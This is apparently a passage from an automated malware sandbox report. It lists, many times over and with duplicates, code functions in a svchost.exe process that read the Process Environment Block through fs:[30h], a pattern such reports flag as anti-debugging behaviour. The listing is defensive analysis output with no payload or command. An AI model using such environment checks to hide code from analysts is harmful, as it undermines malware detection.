                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033527ED mov eax, dword ptr fs:[00000030h]1_2_033527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033527ED mov eax, dword ptr fs:[00000030h]1_2_033527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033527ED mov eax, dword ptr fs:[00000030h]1_2_033527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033BE7E1 mov eax, dword ptr fs:[00000030h]1_2_033BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333C7C0 mov eax, dword ptr fs:[00000030h]1_2_0333C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B07C3 mov eax, dword ptr fs:[00000030h]1_2_033B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334E627 mov eax, dword ptr fs:[00000030h]1_2_0334E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03366620 mov eax, dword ptr fs:[00000030h]1_2_03366620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03368620 mov eax, dword ptr fs:[00000030h]1_2_03368620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333262C mov eax, dword ptr fs:[00000030h]1_2_0333262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372619 mov eax, dword ptr fs:[00000030h]1_2_03372619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AE609 mov eax, dword ptr fs:[00000030h]1_2_033AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334260B mov eax, dword ptr fs:[00000030h]1_2_0334260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334260B mov eax, dword ptr fs:[00000030h]1_2_0334260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334260B mov eax, dword ptr fs:[00000030h]1_2_0334260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334260B mov eax, dword ptr fs:[00000030h]1_2_0334260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334260B mov eax, dword ptr fs:[00000030h]1_2_0334260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334260B mov eax, dword ptr fs:[00000030h]1_2_0334260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334260B mov eax, dword ptr fs:[00000030h]1_2_0334260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03362674 mov eax, dword ptr fs:[00000030h]1_2_03362674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F866E mov eax, dword ptr fs:[00000030h]1_2_033F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F866E mov eax, dword ptr fs:[00000030h]1_2_033F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336A660 mov eax, dword ptr fs:[00000030h]1_2_0336A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336A660 mov eax, dword ptr fs:[00000030h]1_2_0336A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334C640 mov eax, dword ptr fs:[00000030h]1_2_0334C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033666B0 mov eax, dword ptr fs:[00000030h]1_2_033666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336C6A6 mov eax, dword ptr fs:[00000030h]1_2_0336C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03334690 mov eax, dword ptr fs:[00000030h]1_2_03334690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03334690 mov eax, dword ptr fs:[00000030h]1_2_03334690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AE6F2 mov eax, dword ptr fs:[00000030h]1_2_033AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AE6F2 mov eax, dword ptr fs:[00000030h]1_2_033AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AE6F2 mov eax, dword ptr fs:[00000030h]1_2_033AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AE6F2 mov eax, dword ptr fs:[00000030h]1_2_033AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B06F1 mov eax, dword ptr fs:[00000030h]1_2_033B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B06F1 mov eax, dword ptr fs:[00000030h]1_2_033B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0336A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336A6C7 mov eax, dword ptr fs:[00000030h]1_2_0336A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340535 mov eax, dword ptr fs:[00000030h]1_2_03340535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340535 mov eax, dword ptr fs:[00000030h]1_2_03340535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340535 mov eax, dword ptr fs:[00000030h]1_2_03340535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340535 mov eax, dword ptr fs:[00000030h]1_2_03340535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340535 mov eax, dword ptr fs:[00000030h]1_2_03340535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340535 mov eax, dword ptr fs:[00000030h]1_2_03340535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E53E mov eax, dword ptr fs:[00000030h]1_2_0335E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E53E mov eax, dword ptr fs:[00000030h]1_2_0335E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E53E mov eax, dword ptr fs:[00000030h]1_2_0335E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E53E mov eax, dword ptr fs:[00000030h]1_2_0335E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E53E mov eax, dword ptr fs:[00000030h]1_2_0335E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C6500 mov eax, dword ptr fs:[00000030h]1_2_033C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03404500 mov eax, dword ptr fs:[00000030h]1_2_03404500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03404500 mov eax, dword ptr fs:[00000030h]1_2_03404500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03404500 mov eax, dword ptr fs:[00000030h]1_2_03404500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03404500 mov eax, dword ptr fs:[00000030h]1_2_03404500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03404500 mov eax, dword ptr fs:[00000030h]1_2_03404500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03404500 mov eax, dword ptr fs:[00000030h]1_2_03404500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03404500 mov eax, dword ptr fs:[00000030h]1_2_03404500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336656A mov eax, dword ptr fs:[00000030h]1_2_0336656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336656A mov eax, dword ptr fs:[00000030h]1_2_0336656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336656A mov eax, dword ptr fs:[00000030h]1_2_0336656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03338550 mov eax, dword ptr fs:[00000030h]1_2_03338550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03338550 mov eax, dword ptr fs:[00000030h]1_2_03338550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033545B1 mov eax, dword ptr fs:[00000030h]1_2_033545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033545B1 mov eax, dword ptr fs:[00000030h]1_2_033545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B05A7 mov eax, dword ptr fs:[00000030h]1_2_033B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B05A7 mov eax, dword ptr fs:[00000030h]1_2_033B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B05A7 mov eax, dword ptr fs:[00000030h]1_2_033B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E59C mov eax, dword ptr fs:[00000030h]1_2_0336E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03332582 mov eax, dword ptr fs:[00000030h]1_2_03332582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03332582 mov ecx, dword ptr fs:[00000030h]1_2_03332582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03364588 mov eax, dword ptr fs:[00000030h]1_2_03364588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E5E7 mov eax, dword ptr fs:[00000030h]1_2_0335E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E5E7 mov eax, dword ptr fs:[00000030h]1_2_0335E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E5E7 mov eax, dword ptr fs:[00000030h]1_2_0335E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E5E7 mov eax, dword ptr fs:[00000030h]1_2_0335E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E5E7 mov eax, dword ptr fs:[00000030h]1_2_0335E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E5E7 mov eax, dword ptr fs:[00000030h]1_2_0335E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E5E7 mov eax, dword ptr fs:[00000030h]1_2_0335E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E5E7 mov eax, dword ptr fs:[00000030h]1_2_0335E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033325E0 mov eax, dword ptr fs:[00000030h]1_2_033325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336C5ED mov eax, dword ptr fs:[00000030h]1_2_0336C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336C5ED mov eax, dword ptr fs:[00000030h]1_2_0336C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033365D0 mov eax, dword ptr fs:[00000030h]1_2_033365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336A5D0 mov eax, dword ptr fs:[00000030h]1_2_0336A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336A5D0 mov eax, dword ptr fs:[00000030h]1_2_0336A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E5CF mov eax, dword ptr fs:[00000030h]1_2_0336E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E5CF mov eax, dword ptr fs:[00000030h]1_2_0336E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332E420 mov eax, dword ptr fs:[00000030h]1_2_0332E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332E420 mov eax, dword ptr fs:[00000030h]1_2_0332E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332E420 mov eax, dword ptr fs:[00000030h]1_2_0332E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332C427 mov eax, dword ptr fs:[00000030h]1_2_0332C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B6420 mov eax, dword ptr fs:[00000030h]1_2_033B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B6420 mov eax, dword ptr fs:[00000030h]1_2_033B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B6420 mov eax, dword ptr fs:[00000030h]1_2_033B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B6420 mov eax, dword ptr fs:[00000030h]1_2_033B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B6420 mov eax, dword ptr fs:[00000030h]1_2_033B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B6420 mov eax, dword ptr fs:[00000030h]1_2_033B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B6420 mov eax, dword ptr fs:[00000030h]1_2_033B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03368402 mov eax, dword ptr fs:[00000030h]1_2_03368402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03368402 mov eax, dword ptr fs:[00000030h]1_2_03368402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03368402 mov eax, dword ptr fs:[00000030h]1_2_03368402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335A470 mov eax, dword ptr fs:[00000030h]1_2_0335A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335A470 mov eax, dword ptr fs:[00000030h]1_2_0335A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335A470 mov eax, dword ptr fs:[00000030h]1_2_0335A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033BC460 mov ecx, dword ptr fs:[00000030h]1_2_033BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033EA456 mov eax, dword ptr fs:[00000030h]1_2_033EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332645D mov eax, dword ptr fs:[00000030h]1_2_0332645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335245A mov eax, dword ptr fs:[00000030h]1_2_0335245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E443 mov eax, dword ptr fs:[00000030h]1_2_0336E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E443 mov eax, dword ptr fs:[00000030h]1_2_0336E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E443 mov eax, dword ptr fs:[00000030h]1_2_0336E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E443 mov eax, dword ptr fs:[00000030h]1_2_0336E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E443 mov eax, dword ptr fs:[00000030h]1_2_0336E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E443 mov eax, dword ptr fs:[00000030h]1_2_0336E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E443 mov eax, dword ptr fs:[00000030h]1_2_0336E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E443 mov eax, dword ptr fs:[00000030h]1_2_0336E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033644B0 mov ecx, dword ptr fs:[00000030h]1_2_033644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033BA4B0 mov eax, dword ptr fs:[00000030h]1_2_033BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033364AB mov eax, dword ptr fs:[00000030h]1_2_033364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033EA49A mov eax, dword ptr fs:[00000030h]1_2_033EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033304E5 mov ecx, dword ptr fs:[00000030h]1_2_033304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335EB20 mov eax, dword ptr fs:[00000030h]1_2_0335EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335EB20 mov eax, dword ptr fs:[00000030h]1_2_0335EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F8B28 mov eax, dword ptr fs:[00000030h]1_2_033F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F8B28 mov eax, dword ptr fs:[00000030h]1_2_033F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03402B57 mov eax, dword ptr fs:[00000030h]1_2_03402B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03402B57 mov eax, dword ptr fs:[00000030h]1_2_03402B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03402B57 mov eax, dword ptr fs:[00000030h]1_2_03402B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03402B57 mov eax, dword ptr fs:[00000030h]1_2_03402B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]1_2_033AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]1_2_033AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]1_2_033AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]1_2_033AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]1_2_033AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]1_2_033AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]1_2_033AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]1_2_033AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]1_2_033AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03404B00 mov eax, dword ptr fs:[00000030h]1_2_03404B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332CB7E mov eax, dword ptr fs:[00000030h]1_2_0332CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03328B50 mov eax, dword ptr fs:[00000030h]1_2_03328B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DEB50 mov eax, dword ptr fs:[00000030h]1_2_033DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E4B4B mov eax, dword ptr fs:[00000030h]1_2_033E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E4B4B mov eax, dword ptr fs:[00000030h]1_2_033E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C6B40 mov eax, dword ptr fs:[00000030h]1_2_033C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C6B40 mov eax, dword ptr fs:[00000030h]1_2_033C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033FAB40 mov eax, dword ptr fs:[00000030h]1_2_033FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D8B42 mov eax, dword ptr fs:[00000030h]1_2_033D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340BBE mov eax, dword ptr fs:[00000030h]1_2_03340BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340BBE mov eax, dword ptr fs:[00000030h]1_2_03340BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E4BB0 mov eax, dword ptr fs:[00000030h]1_2_033E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E4BB0 mov eax, dword ptr fs:[00000030h]1_2_033E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03338BF0 mov eax, dword ptr fs:[00000030h]1_2_03338BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03338BF0 mov eax, dword ptr fs:[00000030h]1_2_03338BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03338BF0 mov eax, dword ptr fs:[00000030h]1_2_03338BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335EBFC mov eax, dword ptr fs:[00000030h]1_2_0335EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033BCBF0 mov eax, dword ptr fs:[00000030h]1_2_033BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DEBD0 mov eax, dword ptr fs:[00000030h]1_2_033DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03350BCB mov eax, dword ptr fs:[00000030h]1_2_03350BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03350BCB mov eax, dword ptr fs:[00000030h]1_2_03350BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03350BCB mov eax, dword ptr fs:[00000030h]1_2_03350BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03330BCD mov eax, dword ptr fs:[00000030h]1_2_03330BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03330BCD mov eax, dword ptr fs:[00000030h]1_2_03330BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03330BCD mov eax, dword ptr fs:[00000030h]1_2_03330BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03354A35 mov eax, dword ptr fs:[00000030h]1_2_03354A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03354A35 mov eax, dword ptr fs:[00000030h]1_2_03354A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336CA24 mov eax, dword ptr fs:[00000030h]1_2_0336CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335EA2E mov eax, dword ptr fs:[00000030h]1_2_0335EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033BCA11 mov eax, dword ptr fs:[00000030h]1_2_033BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033ACA72 mov eax, dword ptr fs:[00000030h]1_2_033ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033ACA72 mov eax, dword ptr fs:[00000030h]1_2_033ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336CA6F mov eax, dword ptr fs:[00000030h]1_2_0336CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336CA6F mov eax, dword ptr fs:[00000030h]1_2_0336CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336CA6F mov eax, dword ptr fs:[00000030h]1_2_0336CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DEA60 mov eax, dword ptr fs:[00000030h]1_2_033DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03336A50 mov eax, dword ptr fs:[00000030h]1_2_03336A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03336A50 mov eax, dword ptr fs:[00000030h]1_2_03336A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03336A50 mov eax, dword ptr fs:[00000030h]1_2_03336A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03336A50 mov eax, dword ptr fs:[00000030h]1_2_03336A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03336A50 mov eax, dword ptr fs:[00000030h]1_2_03336A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03336A50 mov eax, dword ptr fs:[00000030h]1_2_03336A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03336A50 mov eax, dword ptr fs:[00000030h]1_2_03336A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340A5B mov eax, dword ptr fs:[00000030h]1_2_03340A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340A5B mov eax, dword ptr fs:[00000030h]1_2_03340A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03338AA0 mov eax, dword ptr fs:[00000030h]1_2_03338AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03338AA0 mov eax, dword ptr fs:[00000030h]1_2_03338AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03386AA4 mov eax, dword ptr fs:[00000030h]1_2_03386AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03368A90 mov edx, dword ptr fs:[00000030h]1_2_03368A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333EA80 mov eax, dword ptr fs:[00000030h]1_2_0333EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333EA80 mov eax, dword ptr fs:[00000030h]1_2_0333EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333EA80 mov eax, dword ptr fs:[00000030h]1_2_0333EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333EA80 mov eax, dword ptr fs:[00000030h]1_2_0333EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333EA80 mov eax, dword ptr fs:[00000030h]1_2_0333EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333EA80 mov eax, dword ptr fs:[00000030h]1_2_0333EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333EA80 mov eax, dword ptr fs:[00000030h]1_2_0333EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333EA80 mov eax, dword ptr fs:[00000030h]1_2_0333EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333EA80 mov eax, dword ptr fs:[00000030h]1_2_0333EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03404A80 mov eax, dword ptr fs:[00000030h]1_2_03404A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336AAEE mov eax, dword ptr fs:[00000030h]1_2_0336AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336AAEE mov eax, dword ptr fs:[00000030h]1_2_0336AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03330AD0 mov eax, dword ptr fs:[00000030h]1_2_03330AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03364AD0 mov eax, dword ptr fs:[00000030h]1_2_03364AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03364AD0 mov eax, dword ptr fs:[00000030h]1_2_03364AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03386ACC mov eax, dword ptr fs:[00000030h]1_2_03386ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03386ACC mov eax, dword ptr fs:[00000030h]1_2_03386ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03386ACC mov eax, dword ptr fs:[00000030h]1_2_03386ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03404940 mov eax, dword ptr fs:[00000030h]1_2_03404940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B892A mov eax, dword ptr fs:[00000030h]1_2_033B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C892B mov eax, dword ptr fs:[00000030h]1_2_033C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033BC912 mov eax, dword ptr fs:[00000030h]1_2_033BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03328918 mov eax, dword ptr fs:[00000030h]1_2_03328918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03328918 mov eax, dword ptr fs:[00000030h]1_2_03328918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AE908 mov eax, dword ptr fs:[00000030h]1_2_033AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AE908 mov eax, dword ptr fs:[00000030h]1_2_033AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D4978 mov eax, dword ptr fs:[00000030h]1_2_033D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D4978 mov eax, dword ptr fs:[00000030h]1_2_033D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033BC97C mov eax, dword ptr fs:[00000030h]1_2_033BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03356962 mov eax, dword ptr fs:[00000030h]1_2_03356962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03356962 mov eax, dword ptr fs:[00000030h]1_2_03356962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03356962 mov eax, dword ptr fs:[00000030h]1_2_03356962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0337096E mov eax, dword ptr fs:[00000030h]1_2_0337096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0337096E mov edx, dword ptr fs:[00000030h]1_2_0337096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0337096E mov eax, dword ptr fs:[00000030h]1_2_0337096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B0946 mov eax, dword ptr fs:[00000030h]1_2_033B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B89B3 mov esi, dword ptr fs:[00000030h]1_2_033B89B3
